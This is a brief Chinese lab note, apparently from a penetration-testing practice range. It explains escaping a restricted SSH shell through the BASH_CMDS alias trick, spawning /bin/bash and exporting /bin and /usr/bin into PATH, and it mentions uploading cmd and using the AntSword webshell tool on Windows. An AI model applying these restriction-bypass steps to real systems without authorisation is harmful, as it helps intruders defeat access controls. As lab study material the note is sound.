今天的靶场登陆ssh后发现shell受限,如下
woami都执行不了,查看对应的bin目录,发现只能执行4个命令
在网上学到一招可以绕过这种受限制的被阉割的shell
BASH_CMDS[a]=/bin/sh;a #把/bin/bash给a变量
/bin/bash
echo $0 #查看脚本本身的名字
echo $? #命令执行结果反馈,0代表执行成功,其余数字表示不成功
export PATH=$PATH:/bin/ #将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin #将/usr/bin作为PATH环境变量导出
执行完上面加粗的四步之后就可以执行所有命令了
Windows中如果遇到此类情形
1.找到一处可上传文件的位置上传cmd
2.蚁剑可以自定义cmd的环境变量
